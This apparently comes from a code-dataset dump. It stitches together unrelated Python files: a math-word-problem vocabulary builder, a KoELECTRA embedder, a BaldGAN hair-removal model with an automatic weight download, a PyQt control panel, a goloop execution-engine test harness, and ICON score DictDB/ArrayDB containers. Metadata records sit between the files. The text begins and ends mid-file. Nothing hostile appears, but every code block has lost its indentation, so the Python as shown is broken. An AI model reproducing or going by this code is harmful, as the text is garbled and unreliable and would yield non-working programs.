tokenizer.add_tokens(self.generate_list)
global SpecialTokens
SpecialTokens.PAD_TOKEN=tokenizer.pad_token
SpecialTokens.SOS_TOKEN=tokenizer.bos_token
SpecialTokens.EOS_TOKEN=tokenizer.eos_token
SpecialTokens.UNK_TOKEN=tokenizer.unk_token
if self.embedding == 'bert':
SpecialTokens.SOS_TOKEN=tokenizer.cls_token
SpecialTokens.EOS_TOKEN=tokenizer.sep_token
self.tokenizer=tokenizer
self.in_idx2word = list(tokenizer.get_vocab().keys())
if self.symbol_for_tree:
self._build_symbol_for_tree()
self._build_template_symbol_for_tree()
elif self.equation_fix == FixType.MultiWayTree:
self._build_symbol_for_multi_way_tree()
self._build_template_symbol_for_multi_way_tree()
else:
self._build_symbol()
self._build_template_symbol()
# if self.share_vocab:
# for symbol in self.out_idx2symbol:
# if symbol in self.in_idx2word:
# continue
# else:
# self.in_idx2word.append(symbol)
# for symbol in self.out_idx2symbol:
# if symbol in self.in_idx2word:
# continue
# else:
# self.in_idx2word.append(symbol)
self.in_word2idx = {}
self.out_symbol2idx = {}
self.temp_symbol2idx = {}
for idx, word in enumerate(self.in_idx2word):
self.in_word2idx[word] = idx
for idx, symbol in enumerate(self.out_idx2symbol):
self.out_symbol2idx[symbol] = idx
for idx, symbol in enumerate(self.temp_idx2symbol):
self.temp_symbol2idx[symbol] = idx
def _build_symbol_for_tree(self):
self.out_idx2symbol = copy.deepcopy(self.operator_list)
self.num_start = len(self.out_idx2symbol)
self.out_idx2symbol += self.generate_list
if self.mask_symbol == MaskSymbol.NUM:
mask_list = NumMask.number
try:
self.out_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.generate_list))
elif self.mask_symbol == MaskSymbol.alphabet:
mask_list = NumMask.alphabet
try:
self.out_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("alphabet may not enough to mask {} numbers, changing the mask_symbol from alphabet to number may solve the problem.".format(self.copy_nums))
elif self.mask_symbol == MaskSymbol.number:
mask_list = NumMask.number
try:
self.out_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.generate_list))
else:
raise NotImplementedError("the type of masking number ({}) is not implemented".format(self.mask_symbol))
if self.mask_entity:
mask_list = NumMask.entity
self.out_idx2symbol += [mask_list[i] for i in range(self.copy_etys)]
self.out_idx2symbol += [SpecialTokens.UNK_TOKEN]
def _build_symbol_for_multi_way_tree(self):
self.out_idx2symbol = [SpecialTokens.PAD_TOKEN, SpecialTokens.SOS_TOKEN, SpecialTokens.EOS_TOKEN, SpecialTokens.NON_TOKEN]
self.out_idx2symbol += self.operator_list
self.num_start = len(self.out_idx2symbol)
self.out_idx2symbol += self.generate_list
if self.mask_symbol == MaskSymbol.NUM:
mask_list = NumMask.number
try:
self.out_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.copy_nums))
elif self.mask_symbol == MaskSymbol.alphabet:
mask_list = NumMask.alphabet
try:
self.out_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("alphabet may not enough to mask {} numbers, changing the mask_symbol from alphabet to number may solve the problem.".format(self.copy_nums))
elif self.mask_symbol == MaskSymbol.number:
mask_list = NumMask.number
try:
self.out_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.copy_nums))
else:
raise NotImplementedError("the type of masking number ({}) is not implemented".format(self.mask_symbol))
self.out_idx2symbol += [SpecialTokens.UNK_TOKEN]
def _build_symbol(self):
if self.share_vocab:
self.out_idx2symbol = [SpecialTokens.PAD_TOKEN] + [SpecialTokens.EOS_TOKEN] + self.operator_list
else:
self.out_idx2symbol = [SpecialTokens.PAD_TOKEN] + [SpecialTokens.SOS_TOKEN] + [SpecialTokens.EOS_TOKEN] + self.operator_list
if self.model.lower() in ['hms']:
self.out_idx2symbol = [SpecialTokens.PAD_TOKEN] + [SpecialTokens.EOS_TOKEN] + self.operator_list
self.num_start = len(self.out_idx2symbol)
self.out_idx2symbol += self.generate_list
if self.model.lower() in ['hms']:
self.out_idx2symbol += [SpecialTokens.UNK_TOKEN]
if self.mask_symbol == MaskSymbol.NUM:
mask_list = NumMask.number
try:
self.out_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.generate_list))
elif self.mask_symbol == MaskSymbol.alphabet:
mask_list = NumMask.alphabet
try:
self.out_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("alphabet may not enough to mask {} numbers, changing the mask_symbol from alphabet to number may solve the problem.".format(self.copy_nums))
elif self.mask_symbol == MaskSymbol.number:
mask_list = NumMask.number
try:
self.out_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.generate_list))
else:
raise NotImplementedError("the type of masking number ({}) is not implemented".format(self.mask_symbol))
for data in self.trainset:
words_list = data["equation"]
for word in words_list:
if word in self.out_idx2symbol:
continue
elif word[0].isdigit():
continue
elif (word[0].isalpha() or word[0].isdigit()) is not True:
self.out_idx2symbol.insert(self.num_start, word)
self.num_start += 1
continue
else:
self.out_idx2symbol.append(word)
if self.model.lower() in ['hms']:
return
self.out_idx2symbol += [SpecialTokens.UNK_TOKEN]
def _build_template_symbol_for_multi_way_tree(self):
self.temp_idx2symbol = [SpecialTokens.PAD_TOKEN, SpecialTokens.SOS_TOKEN, SpecialTokens.EOS_TOKEN, SpecialTokens.NON_TOKEN, SpecialTokens.OPT_TOKEN]
self.temp_num_start = len(self.temp_idx2symbol)
self.temp_idx2symbol += self.generate_list
if self.mask_symbol == MaskSymbol.NUM:
mask_list = NumMask.number
try:
self.temp_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.copy_nums))
elif self.mask_symbol == MaskSymbol.alphabet:
mask_list = NumMask.alphabet
try:
self.temp_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("alphabet may not enough to mask {} numbers, changing the mask_symbol from alphabet to number may solve the problem.".format(self.copy_nums))
elif self.mask_symbol == MaskSymbol.number:
mask_list = NumMask.number
try:
self.temp_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.copy_nums))
else:
raise NotImplementedError("the type of masking number ({}) is not implemented".format(self.mask_symbol))
self.temp_idx2symbol += [SpecialTokens.UNK_TOKEN]
def _build_template_symbol(self):
if self.share_vocab:
self.temp_idx2symbol = [SpecialTokens.PAD_TOKEN] + [SpecialTokens.EOS_TOKEN] + [SpecialTokens.OPT_TOKEN]
else:
self.temp_idx2symbol = [SpecialTokens.PAD_TOKEN] + [SpecialTokens.SOS_TOKEN] + [SpecialTokens.EOS_TOKEN] + [SpecialTokens.OPT_TOKEN]
self.temp_num_start = len(self.temp_idx2symbol)
self.temp_idx2symbol += self.generate_list
if self.mask_symbol == MaskSymbol.NUM:
mask_list = NumMask.number
try:
self.temp_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.copy_nums))
elif self.mask_symbol == MaskSymbol.alphabet:
mask_list = NumMask.alphabet
try:
self.temp_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("alphabet may not enough to mask {} numbers, changing the mask_symbol from alphabet to number may solve the problem.".format(self.copy_nums))
elif self.mask_symbol == MaskSymbol.number:
mask_list = NumMask.number
try:
self.temp_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.copy_nums))
else:
raise NotImplementedError("the type of masking number ({}) is not implemented".format(self.mask_symbol))
for data in self.trainset:
words_list = data["template"]
for word in words_list:
if word in self.temp_idx2symbol:
continue
elif word[0].isdigit():
continue
elif (word[0].isalpha() or word[0].isdigit()) is not True:
self.temp_idx2symbol.insert(self.temp_num_start, word)
self.temp_num_start += 1
continue
else:
self.temp_idx2symbol.append(word)
self.temp_idx2symbol += [SpecialTokens.UNK_TOKEN]
def _build_template_symbol_for_tree(self):
self.temp_idx2symbol = [SpecialTokens.OPT_TOKEN]
self.temp_num_start = len(self.temp_idx2symbol)
self.temp_idx2symbol += self.generate_list
if self.mask_symbol == MaskSymbol.NUM:
mask_list = NumMask.number
try:
self.temp_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.copy_nums))
elif self.mask_symbol == MaskSymbol.alphabet:
mask_list = NumMask.alphabet
try:
self.temp_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("alphabet may not enough to mask {} numbers, changing the mask_symbol from alphabet to number may solve the problem.".format(self.copy_nums))
elif self.mask_symbol == MaskSymbol.number:
mask_list = NumMask.number
try:
self.temp_idx2symbol += [mask_list[i] for i in range(self.copy_nums)]
except IndexError:
raise IndexError("{} numbers is not enough to mask {} numbers ".format(len(mask_list), self.copy_nums))
else:
raise NotImplementedError("the type of masking number ({}) is not implemented".format(self.mask_symbol))
self.temp_idx2symbol += [SpecialTokens.UNK_TOKEN]
def _update_vocab(self, vocab_list):
index = len(self.in_idx2word)
for word in vocab_list:
if word not in self.in_idx2word:
self.in_idx2word.append(word)
self.in_word2idx[word] = index
index += 1
def get_vocab_size(self):
"""
Returns:
(tuple(int, int)): the length of input vocabulary and output symbols
"""
return len(self.in_idx2word), len(self.out_idx2symbol)
```
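The constructor above only reads plain keys from its config, so the expected configuration can be sketched as a dict. The key names come from the docstring and the attribute reads above; the values are illustrative assumptions rather than mwptoolkit defaults, and the real framework supplies them through its Config object.
```python
# Illustrative values only; mwptoolkit normally builds these from YAML via its Config class.
pretrain_config = {
    "task_type": "single_equation",
    "embedding": "koelectra",
    "pretrained_model_path": "monologg/koelectra-base-v3-discriminator",  # assumed checkpoint
    "rule1": False,
    "rule2": False,
    "parse_tree_file_name": None,
    "model": "mwpbert",              # hypothetical model name
    "dataset": "math23k",
    "equation_fix": "prefix",
    "mask_symbol": "NUM",
    "min_generate_keep": 5,
    "symbol_for_tree": True,
    "share_vocab": False,
    "k_fold": None,
    "shuffle": True,
}
```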
#### File: module/Embedder/koelectra_embedder.py
```python
import torch
from torch import nn
from transformers import ElectraModel
class KoElectraEmbedder(nn.Module):
def __init__(self,input_size,pretrained_model_path):
super(KoElectraEmbedder,self).__init__()
self.koelectra=ElectraModel.from_pretrained(pretrained_model_path)
def forward(self,input_seq,attn_mask):
output=self.koelectra(input_seq,attention_mask = attn_mask)[0]
return output
def token_resize(self,input_size):
self.koelectra.resize_token_embeddings(input_size)
``` |
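A minimal usage sketch for the embedder above. The checkpoint name is an assumption; any KoELECTRA checkpoint compatible with ElectraModel and ElectraTokenizer should behave the same way.
```python
import torch
from transformers import ElectraTokenizer

CKPT = "monologg/koelectra-base-v3-discriminator"   # assumed checkpoint path/name
tokenizer = ElectraTokenizer.from_pretrained(CKPT)
embedder = KoElectraEmbedder(input_size=None, pretrained_model_path=CKPT)

enc = tokenizer("이 문제의 답을 구하시오.", return_tensors="pt")
with torch.no_grad():
    hidden = embedder(enc["input_ids"], enc["attention_mask"])
print(hidden.shape)   # (1, seq_len, hidden_size)
```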
{
"source": "jinwoo1225/HAiR",
"score": 3
} |
#### File: HAiR/models/baldgan.py
```python
import os
import urllib
import cv2
import keras.backend as K
import matplotlib.pyplot as plt
import numpy as np
from tensorflow.keras.layers import GlobalAveragePooling2D, multiply, Permute
from tensorflow.keras.layers import Input, Dense, Reshape, Dropout, Concatenate
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.convolutional import UpSampling2D, Conv2D
from tensorflow.keras.models import Model
from keras_contrib.layers.normalization.instancenormalization import InstanceNormalization
from skimage import transform as trans
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
model_path = BASE_DIR + "/checkpoints/baldgan/"
model_paths = {
# 'D': model_path + 'model_D_5_170.hdf5',
# 'D_mask': model_path + 'model_D_mask_5_170.hdf5',
'G': model_path + 'model_G_5_170.hdf5'
}
class BaldGAN:
def __init__(self):
if not os.path.isdir(model_path):
print("baldGAN : failed to find exact folder, creating...")
os.mkdir(model_path)
if not os.path.isfile(model_paths['G']):
print("baldGAN : failed to find model, downloading...")
url = 'https://jinwoo17962.synology.me/datasets/baldgan/model_G_5_170.hdf5'
urllib.request.urlretrieve(url, model_paths['G'])
K.set_learning_phase(0)
# Image input
d0 = Input(shape=(256, 256, 3))
gf = 64
# Downsampling
d1 = conv2d(d0, gf, bn=False, se=True)
d2 = conv2d(d1, gf * 2, se=True)
d3 = conv2d(d2, gf * 4, se=True)
d4 = conv2d(d3, gf * 8)
d5 = conv2d(d4, gf * 8)
a1 = atrous(d5, gf * 8)
# Upsampling
u3 = deconv2d(a1, d4, gf * 8)
u4 = deconv2d(u3, d3, gf * 4)
u5 = deconv2d(u4, d2, gf * 2)
u6 = deconv2d(u5, d1, gf)
u7 = UpSampling2D(size=2)(u6)
output_img = Conv2D(3, kernel_size=4, strides=1, padding='same', activation='tanh')(u7)
self.model = Model(d0, output_img)
self.model.load_weights(model_paths['G'])
def go_bald(self, image: np.ndarray):
input_face = np.expand_dims(image, axis=0)
input_face = (input_face / 127.5) - 1.
result = self.model.predict(input_face)[0]
result = ((result + 1.) * 127.5)
result = result.astype(np.uint8)
return result
def squeeze_excite_block(input, ratio=4):
init = input
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
filters = init.shape[channel_axis]
se_shape = (1, 1, filters)
se = GlobalAveragePooling2D()(init)
se = Reshape(se_shape)(se)
se = Dense(filters // ratio, activation='relu', kernel_initializer='he_normal', use_bias=False)(se)
se = Dense(filters, activation='sigmoid', kernel_initializer='he_normal', use_bias=False)(se)
if K.image_data_format() == 'channels_first':
se = Permute((3, 1, 2))(se)
x = multiply([init, se])
return x
def conv2d(layer_input, filters, f_size=4, bn=True, se=False):
d = Conv2D(filters, kernel_size=f_size, strides=2, padding='same')(layer_input)
d = LeakyReLU(alpha=0.2)(d)
if bn:
d = InstanceNormalization()(d)
if se:
d = squeeze_excite_block(d)
return d
def deconv2d(layer_input, skip_input, filters, f_size=4, dropout_rate=0):
u = UpSampling2D(size=2)(layer_input)
u = Conv2D(filters, kernel_size=f_size, strides=1, padding='same', activation='relu')(u)
if dropout_rate:
u = Dropout(dropout_rate)(u)
u = InstanceNormalization()(u)
u = Concatenate()([u, skip_input])
return u
def atrous(layer_input, filters, f_size=4, bn=True):
a_list = []
for rate in [2, 4, 8]:
# a = AtrousConvolution2D(filters, f_size, atrous_rate=rate, border_mode='same')(layer_input)
a = Conv2D(filters, kernel_size=f_size, dilation_rate=rate, padding='same')(layer_input)
a_list.append(a)
a = Concatenate()(a_list)
a = LeakyReLU(alpha=0.2)(a)
if bn:
a = InstanceNormalization()(a)
return a
```
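A minimal usage sketch for the generator above, assuming a BGR face crop on disk (the file path is hypothetical) resized to the 256x256 input the network expects:
```python
import cv2

bald_gan = BaldGAN()   # downloads model_G_5_170.hdf5 on first run if missing

face = cv2.imread("face_crop.jpg")                        # hypothetical input path
face = cv2.resize(face, (256, 256), interpolation=cv2.INTER_AREA)
bald_face = bald_gan.go_bald(face)                        # uint8 BGR, 256x256x3
cv2.imwrite("face_bald.jpg", bald_face)
```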
#### File: BoundingBox/__test__/test_BoundingBox.py
```python
import unittest
import cv2
from src.components.BoundingBox.BoundingBox import BoundingBox
class TestBoundingBox(unittest.TestCase):
def test_BoundingBox(self):
bb = BoundingBox(cv2.imread('../../../../test_images/testface_1.jpg'))
self.assertIsNotNone(bb.get_bounding_box())
def test_assert_off_axis_left_upper(self):
bb = BoundingBox(cv2.imread('../../../../test_images/testface_1_offaxis_left_upper.jpg'))
with self.assertRaisesRegex(ValueError, "BoundingBoxOffLimitError"):
bb.get_bounding_box()
def test_assert_off_axis_left_lower(self):
bb = BoundingBox(cv2.imread('../../../../test_images/testface_1_offaxis_left_lower.jpg'))
with self.assertRaisesRegex(ValueError, "BoundingBoxOffLimitError"):
bb.get_bounding_box()
def test_assert_off_axis_right_upper(self):
bb = BoundingBox(cv2.imread('../../../../test_images/testface_1_offaxis_right_upper.jpg'))
with self.assertRaisesRegex(ValueError, "BoundingBoxOffLimitError"):
bb.get_bounding_box()
def test_assert_off_axis_right_lower(self):
bb = BoundingBox(cv2.imread('../../../../test_images/testface_1_offaxis_right_lower.jpg'))
with self.assertRaisesRegex(ValueError, "BoundingBoxOffLimitError"):
bb.get_bounding_box()
def test_assert_no_face(self):
bb = BoundingBox(cv2.imread('../../../../test_images/testface_1_noface.jpg'))
with self.assertRaisesRegex(ValueError, "NoFaceError"):
bb.get_bounding_box()
if __name__ == '__main__':
unittest.main()
```
#### File: components/MaskOrientGenerator/MaskOrientGenerator.py
```python
import numpy as np
from src.components.MaskOrientGenerator.calOrient import Orient
from src.components.MaskOrientGenerator.faceSegmentation import FaceSegmentation
class MaskOrientGenerator:
faceSegmentation = FaceSegmentation()
orient = Orient()
def generate(self, aligned_scaled_patch: np.ndarray) -> tuple:
'''
        Returns the mask and the orient dense map computed from a 512 * 512 aligned_scaled_patch.
        param aligned_scaled_patch : a 512 * 512 image that has already been aligned and scaled
        return mask : the mask image of aligned_scaled_patch
            orient : the orient dense map of aligned_scaled_patch
'''
mask = self.generate_mask(aligned_scaled_patch)
orient = self.generate_orient(aligned_scaled_patch, mask)
return mask, orient
def generate_mask(self, image: np.ndarray) -> np.ndarray:
'''
        Returns the mask image computed from a 512 * 512 source image.
        param image : source image
        return : the mask of image
'''
return MaskOrientGenerator.faceSegmentation.image_to_mask(image, 256, 512)
def generate_orient(self, image: np.ndarray, mask: np.ndarray) -> np.ndarray:
'''
        Returns the orient dense map computed from a 512 * 512 image and its mask.
        param image : source image
            mask : the mask of the source image
        return : the orient dense map of image
'''
return MaskOrientGenerator.orient.makeOrient(image, mask)
```
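A short usage sketch, assuming a 512x512 aligned and scaled patch is already available (the path is hypothetical):
```python
import cv2

patch = cv2.imread("aligned_scaled_patch.png")   # hypothetical 512x512 BGR patch
generator = MaskOrientGenerator()
mask, orient = generator.generate(patch)
print(mask.shape, orient.shape)
```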
#### File: util/UserInterface/ControlBox.py
```python
from PyQt5 import QtCore
from PyQt5.QtCore import pyqtSignal
from PyQt5.QtGui import QFont
from PyQt5.QtWidgets import QVBoxLayout, QPushButton, QLabel
RIGHT_BOX_WIDTH = 400
RIGHT_BOX_HEIGHT = int(RIGHT_BOX_WIDTH * 0.5625)
class ControlBox(QVBoxLayout):
result = pyqtSignal()
transform = pyqtSignal()
close = pyqtSignal()
def __init__(self):
super(ControlBox, self).__init__()
self.setAlignment(QtCore.Qt.AlignCenter)
self.progress_label = QLabel()
self.progress_label.setFixedSize(RIGHT_BOX_WIDTH, 40)
self.progress_label.setAlignment(QtCore.Qt.AlignCenter)
font = QFont()
font.setWeight(64)
font.setPointSize(18)
self.progress_label.setFont(font)
self.set_ready()
        self.transform_button = QPushButton("변환")  # "Transform"
self.transform_button.setFixedSize(RIGHT_BOX_WIDTH, 40)
self.transform_button.clicked.connect(self.transform_signal)
self.transform_button.setFont(font)
        self.result_button = QPushButton("결과보기")  # "Show result"
self.result_button.setFixedSize(RIGHT_BOX_WIDTH, 40)
self.result_button.clicked.connect(self.result_signal)
self.result_button.setFont(font)
self.result_button.setDisabled(True)
        self.close_button = QPushButton("종료")  # "Quit"
self.close_button.setFixedSize(RIGHT_BOX_WIDTH, 40)
self.close_button.clicked.connect(self.close_signal)
self.close_button.setFont(font)
self.addWidget(self.progress_label)
self.addWidget(self.transform_button)
self.addWidget(self.result_button)
self.addWidget(self.close_button)
def result_signal(self):
self.result.emit()
def transform_signal(self):
self.transform.emit()
def close_signal(self):
self.close.emit()
def set_ready(self):
self.progress_label.setText("Ready")
self.progress_label.setStyleSheet("background-color: green; color:white")
def set_processing(self):
self.progress_label.setText("PROCESSING")
self.progress_label.setStyleSheet("background-color: blue; color:white")
def set_error(self):
self.progress_label.setText("ERROR")
self.progress_label.setStyleSheet("background-color: red; color:white")
def initialize(self):
self.set_ready()
self.result_button.setDisabled(True)
```
#### File: util/UserInterface/ndarrayToQpixmap.py
```python
import numpy as np
import qimage2ndarray
from PyQt5.QtGui import QPixmap
def ndarray_to_qpixmap(image: np.ndarray) -> QPixmap:
return QPixmap.fromImage(
qimage2ndarray
.array2qimage(image)
.rgbSwapped()
)
```
#### File: util/UserInterface/TransformWorker.py
```python
import numpy as np
from PyQt5.QtCore import QObject, pyqtSignal, QRunnable
from src.transformers.Transformer import Transformer
from src.util.capture import Capture
class TransformerSignal(QObject):
transformed = pyqtSignal(np.ndarray)
class TransformWorker(QRunnable):
def __init__(self, capture: Capture, transformer: Transformer):
super(TransformWorker, self).__init__()
self.signal = TransformerSignal()
self.capture = capture
self.T = transformer
def run(self):
image = self.capture.get()
transformed_image = self.T.transform(image)
if (transformed_image == image).all():
self.signal.transformed.emit(np.ndarray([0]))
else:
self.signal.transformed.emit(transformed_image)
``` |
{
"source": "JINWOO-J/goloop",
"score": 3
} |
#### File: cmd/eetest/eetest.py
```python
import sys
import os.path
from copy import copy
import os
basedir = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../pyee"))
sys.path.append(basedir)
from pyexec.ipc import *
class Address(object):
def __init__(self, obj):
if isinstance(obj, bytes):
if len(obj) < 21:
raise Exception("IllegalFormat")
self.__bytes = copy(obj)
elif isinstance(obj, str):
if len(obj) < 42:
raise Exception("IllegalFormat")
prefix = bytes([obj[:2] == "cx"])
body = bytes.fromhex(obj[2:])
self.__bytes = prefix + body
else:
raise Exception("IllegalFormat")
@staticmethod
def from_str(s: str) -> 'Address':
if len(s) < 42:
raise Exception("IllegalFormat")
prefix = bytes([s[:2] == "cx"])
body = bytes.fromhex(s[2:])
return Address(prefix + body)
def to_bytes(self):
return copy(self.__bytes)
def __str__(self):
body = self.__bytes[1:].hex()
if self.__bytes[0] == 0:
return "hx" + body
else:
return "cx" + body
def __repr__(self):
return f'Address("{self.__str__()}")'
class EECodec(Codec):
__instance = None
def __new__(cls, *args, **kwargs):
if cls.__instance is None:
cls.__instance = object.__new__(cls, *args, **kwargs)
return cls.__instance
def encode(self, obj) -> Tuple[int, bytes]:
if isinstance(obj, Address):
return TypeTag.ADDRESS, obj.to_bytes()
raise Exception
def decode(self, t: int, b: bytes) -> Any:
if t == TypeTag.ADDRESS:
return Address(b)
else:
raise Exception("UnknownType:" + t)
class TestEE(object):
def __init__(self, proxy: 'ServiceManagerProxy'):
self.__proxy = proxy
proxy.set_codec(EECodec())
proxy.set_invoke_handler(self.invoke_handler)
proxy.set_api_handler(self.api_handler)
def invoke_handler(self, code: str, is_query: bool, _from: 'Address', _to: 'Address',
value: int, limit: int, method: str, params: Any, info: Any) -> Tuple[int, int, Any]:
print(f'invoke_handler(code={repr(code)},is_query={is_query},from={_from},to={_to},' +
f'value={value},limit={limit},method={repr(method)},params={params},info={info})')
self.set_value(b"hello", b"world")
self.get_value(b'hello')
self.set_value(b'foo', None)
self.get_value(b'foo')
self.get_balance(Address("cx1000000000000000000000000000000000000000"))
self.send_event(["LogEvent(int,str,Address)", 1, params[0]],
[Address.from_str("cx0004444444444444444444444444444444444444")])
return Status.SUCCESS, 10, "Test"
def api_handler(self, code: str) -> APIInfo:
info = APIInfo(self.__proxy)
info.add_function("hello", 0, 0, [
("msg", DataType.STRING, None)
], [
DataType.STRING
])
info.add_event("LogEvent", 2, [
("id", DataType.INTEGER, None),
("msg", DataType.STRING, None),
("addr", DataType.ADDRESS, None)
])
return Status.SUCCESS, info
def get_value(self, k: bytes) -> Tuple[bool, bytes]:
ret = self.__proxy.get_value(k)
print(f"get_value({repr(k)}) -> {repr(ret)}")
return ret
def get_balance(self, addr: Address) -> int:
ret = self.__proxy.get_balance(addr)
print(f"get_balance({repr(addr)}) -> {ret}")
return ret
def set_value(self, k: bytes, v: Union[bytes, None]):
print(f"set_value({repr(k)},{repr(v)})")
return self.__proxy.set_value(k, v)
def get_info(self) -> Any:
info = self.__proxy.get_info()
print(f"get_info() -> {info}")
return info
def send_event(self, indexed: List[Any], data: List[Any]):
print(f"send_event({indexed},{data})")
self.__proxy.send_event(indexed, data)
def connect(self, addr: str):
print(f"connect({addr})")
self.__proxy.connect(addr)
self.__proxy.send_version(1, str(os.getpid()), "python")
def loop(self):
self.__proxy.loop()
def main():
proxy = ServiceManagerProxy()
ee = TestEE(proxy)
ee.connect("/tmp/ee.socket")
ee.loop()
if __name__ == "__main__":
main()
```
#### File: pyexec/iconscore/icon_container_db.py
```python
from typing import TypeVar, Optional, Any, Union, TYPE_CHECKING
from ..base.address import Address
from ..base.exception import InvalidParamsException, InvalidContainerAccessException
from ..utils import int_to_bytes, bytes_to_int
if TYPE_CHECKING:
from ..database.db import IconScoreDatabase
K = TypeVar('K', int, str, Address, bytes)
V = TypeVar('V', int, str, Address, bytes, bool)
ARRAY_DB_ID = b'\x00'
DICT_DB_ID = b'\x01'
VAR_DB_ID = b'\x02'
class ContainerUtil(object):
@staticmethod
def encode_key(key: K) -> bytes:
if key is None:
raise InvalidParamsException('key is None')
if isinstance(key, int):
bytes_key = int_to_bytes(key)
elif isinstance(key, str):
bytes_key = key.encode('utf-8')
elif isinstance(key, Address):
bytes_key = key.to_bytes()
elif isinstance(key, bytes):
bytes_key = key
else:
raise InvalidParamsException(f'Unsupported key type: {type(key)}')
return bytes_key
@staticmethod
def encode_value(value: V) -> bytes:
if isinstance(value, int):
byte_value = int_to_bytes(value)
elif isinstance(value, str):
byte_value = value.encode('utf-8')
elif isinstance(value, Address):
byte_value = value.to_bytes()
elif isinstance(value, bool):
byte_value = int_to_bytes(int(value))
elif isinstance(value, bytes):
byte_value = value
else:
raise InvalidParamsException(f'Unsupported value type: {type(value)}')
return byte_value
@staticmethod
def decode_object(value: bytes, value_type: type) -> Optional[Union[K, V]]:
if value is None:
return get_default_value(value_type)
obj_value = None
if value_type == int:
obj_value = bytes_to_int(value)
elif value_type == str:
obj_value = value.decode()
elif value_type == Address:
obj_value = Address.from_bytes(value)
        elif value_type == bool:
obj_value = bool(bytes_to_int(value))
elif value_type == bytes:
obj_value = value
return obj_value
def get_default_value(value_type: type) -> Any:
if value_type == int:
return 0
elif value_type == str:
return ""
elif value_type == bool:
return False
return None
class DictDB(object):
"""
Utility classes wrapping the state DB.
DictDB behaves more like python dict.
DictDB does not maintain order.
:K: [int, str, Address, bytes]
:V: [int, str, Address, bytes, bool]
"""
def __init__(self, var_key: K, db: 'IconScoreDatabase', value_type: type, depth: int = 1) -> None:
self._db = db.get_sub_db(ContainerUtil.encode_key(var_key), tag=DICT_DB_ID)
self.__value_type = value_type
self.__depth = depth
def remove(self, key: K) -> None:
"""
Removes the value of given key
:param key: key
"""
self.__remove(key)
def __setitem__(self, key: K, value: V) -> None:
if self.__depth != 1:
raise InvalidContainerAccessException('DictDB depth mismatch')
encoded_key: bytes = ContainerUtil.encode_key(key)
encoded_value: bytes = ContainerUtil.encode_value(value)
self._db.put(encoded_key, encoded_value)
def __getitem__(self, key: K) -> Any:
if self.__depth == 1:
encoded_key: bytes = ContainerUtil.encode_key(key)
return ContainerUtil.decode_object(self._db.get(encoded_key), self.__value_type)
else:
return DictDB(key, self._db, self.__value_type, self.__depth - 1)
def __delitem__(self, key: K):
self.__remove(key)
def __contains__(self, key: K):
# Plyvel doesn't allow setting None value in the DB.
# so there is no case of returning None value if the key exists.
value = self._db.get(ContainerUtil.encode_key(key))
return value is not None
def __remove(self, key: K) -> None:
if self.__depth != 1:
raise InvalidContainerAccessException('DictDB depth mismatch')
self._db.delete(ContainerUtil.encode_key(key))
class ArrayDB(object):
"""
Utility classes wrapping the state DB.
ArrayDB supports length and iterator, maintains order.
:K: [int, str, Address, bytes]
:V: [int, str, Address, bytes, bool]
"""
def __init__(self, var_key: K, db: 'IconScoreDatabase', value_type: type) -> None:
self._db = db.get_sub_db(ContainerUtil.encode_key(var_key), tag=ARRAY_DB_ID)
self.__value_type = value_type
def put(self, value: V) -> None:
"""
Puts the value at the end of array
:param value: value to add
"""
size: int = self.__get_size()
self.__put(size, value)
self.__set_size(size + 1)
def pop(self) -> Optional[V]:
"""
Gets and removes last added value
:return: last added value
"""
size: int = self.__get_size()
if size == 0:
return None
index = size - 1
last_val = self[index]
self._db.delete(ContainerUtil.encode_key(index))
self.__set_size(index)
return last_val
def get(self, index: int = 0) -> V:
"""
Gets the value at index
:param index: index
:return: value at the index
"""
return self[index]
def __get_size(self) -> int:
return ContainerUtil.decode_object(self._db.get(None), int)
def __set_size(self, size: int) -> None:
byte_value = ContainerUtil.encode_value(size)
self._db.put(None, byte_value)
def __put(self, index: int, value: V) -> None:
byte_value = ContainerUtil.encode_value(value)
self._db.put(ContainerUtil.encode_key(index), byte_value)
def __iter__(self):
return self._get_generator(self._db, self.__get_size(), self.__value_type)
def __len__(self):
return self.__get_size()
def __setitem__(self, index: int, value: V) -> None:
if not isinstance(index, int):
raise InvalidParamsException('Invalid index type: not an integer')
size = self.__get_size()
if index < 0:
index += size
if 0 <= index < size:
self.__put(index, value)
else:
raise InvalidParamsException('ArrayDB out of index')
def __getitem__(self, index: int) -> V:
return ArrayDB._get(self._db, self.__get_size(), index, self.__value_type)
